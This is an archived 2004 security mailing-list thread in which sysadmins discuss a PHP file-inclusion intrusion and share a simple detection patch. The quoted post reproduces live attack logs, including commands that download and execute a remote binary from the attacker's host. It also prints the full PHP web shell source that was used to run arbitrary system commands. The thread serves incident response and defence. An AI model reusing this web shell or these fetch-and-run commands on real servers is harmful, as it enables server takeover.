[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: Hack attempt

To: Norbert Crettol <norbert.crettol@idiap.ch>
Subject: Re: Hack attempt
From: "nathan c. dickerson" <nathan@pro.net>
Date: Fri, 23 Jul 2004 23:18:40 -0700
Cc: focus-linux@securityfocus.com
Delivered-to: shane@homeo.stud.ntnu.no
Delivered-to: mailing list focus-linux@securityfocus.com
Delivered-to: moderator for focus-linux@securityfocus.com
In-reply-to: <20040721170230.3e78829b.norbert.crettol@idiap.ch>
List-help: <mailto:focus-linux-help@securityfocus.com>
List-id: <focus-linux.list-id.securityfocus.com>
List-post: <mailto:focus-linux@securityfocus.com>
List-subscribe: <mailto:focus-linux-subscribe@securityfocus.com>
List-unsubscribe: <mailto:focus-linux-unsubscribe@securityfocus.com>
Mailing-list: contact focus-linux-help@securityfocus.com; run by ezmlm
References: <20040721170230.3e78829b.norbert.crettol@idiap.ch>
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6b) Gecko/20031205 Thunderbird/0.4

Hi Norbert,

I dealt with the exact same intrusion technique on one of the webservers here two weeks ago. They managed to get in and launch a perl based IRC bot which was essentially a remote shell. This raised the CPU, which shows up in our server monitering software, and I managed to detect and stop it before they got root. I had the temp directories set to non-executable, and had some firewall settings so they needed to use a script interpreted callback technique to really get access. (binary executables wouldn't work with the nonexec temp directories).

It was also a file injection. After awhile trying to figure out how they were getting in (120+ websites on the machine), I found where they were attacking, and patched the file with:

<?php if(!$bodyfile){ $bodyfile = "default"; // change to default body file. } else { $ret = strstr($bodyfile, "://"); if($ret == true) { echo "Send your message telling them to go away here :)"; $message = print_r($_SERVER, true); mail("your@email.com", "Exploit attempt detected", $message); exit(); } } ?>

An attacker can inject files via php's https:// ftp:// http:// streams. This detection stops the attack, prints them a message, and dump all the server variables in an email.

They were more annoying then anything, so I thought it would be fun to send them a little message upon attack.

It is quite possible to have it execute a suid program to modified your IP tables to automatically ban further connections from their address. Its just a neat way to express your annoyance, while gaining some information on the attacker.

The attackers I dealt with were looking to deface the websites, and I managed to track them down (on the web and irc) to a defacement group out of Brazil, including some home DSL ips, which probably were their real addresses.

Norbert Crettol wrote:

Hi all.
This is my first post here. I'm Norbert Crettol, one of the sysadmins
of Idiap, a research center in Switzerland (www.idiap.ch).
We've had a undesired visitor, last night, that I discovered in the reports of tripwire.

Here are the logs we got (we get a remote copy of the web server logs in another host). As of the second line, I've stripped the head and the tail of the line which is allways the same. --- begin --- "GET /<some script>.php?bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=id HTTP/1.0" 200 6625 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=uname%20-a bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=wget bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=/sbin/ifconfig%20-a bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/;ls%20-la bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;ls%20-la bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;wget%20bosscalvin.com/bind2080 bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;chmod%20755%20bind2080 bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;./bind2080 --- end --- I've seen no other

It looks like bind8080 has created a directory /var/lock/.tmp and expanded an (owned by the web server owner) archive there. Here is the list of the files : 3225 jui 20 03:53 c-leet 15 jui 20 03:47 c-leet.dir 51 jui 20 03:47 cron.d 512 mai 12 2002 doc/ 14 jui 21 16:27 eggdrop -> eggdrop-1.6.10* 2523568 mai 12 2002 eggdrop-1.6.10* 512 mai 12 2002 filesys/ 343 fév 11 03:55 fuck* 512 mai 12 2002 help/ 21149 nov 4 2003 kik* 1024 jui 21 11:00 language/ 512 mai 12 2002 logs/ 6 jui 20 03:48 pid.CaEm- 23065 jan 29 15:00 proc* 6 jui 20 03:48 psybnc.pid 28591 mai 12 2002 README 89 jui 20 03:53 run* 588 avr 1 10:00 run-* 708 avr 1 10:00 run--* 512 mar 31 08:12 scripts/ 512 mai 12 2002 text/ 2523568 mar 28 01:41 vi* 30293 nov 17 2002 xhide* 182 jui 20 03:47 y2kupdate*
Here is the content of http://www.bosscalvin.com/inject.txt :
--- begin ---

 <center>
CMD - System Command </center></center> 
# CMD PHP : 
# Released by : SecurityCorp 
# Edited by CaEm
 
 
<hr color="red" width=751px height=115px>
 
<pre>
<?
 // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
 if (isset($chdir)) @chdir($chdir);
 ob_start();
 system("$cmd 1> /tmp/nobody 2>&1; cat /tmp/nobody; rm -rf /tmp/nobody");
 $output = ob_get_contents();
 ob_end_clean();
 if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?>
</pre>
 
<hr color="red" width=751px height=115px>
 
« CaEm » @ îrç.Ðå£.ñët #Renjana 
--- end ---
Has someone seen this kind of attack ? (chkrootkit doesn't detect it). Has someone heard of this www.bosscalvin.com (or www.calvinmumu.org) ? Is there a way to stop this guy ? His nickname (CaEm) appears in the the uploaded scripts.
Norbert

References:
- Hack attempt
 - From: Norbert Crettol <norbert.crettol@idiap.ch>

Prev by Date: Re: Hack attempt
Next by Date: Re: Hack attempt
Previous by thread: Re: Hack attempt
Next by thread: Re: Hack attempt
Index(es):
- Date
- Thread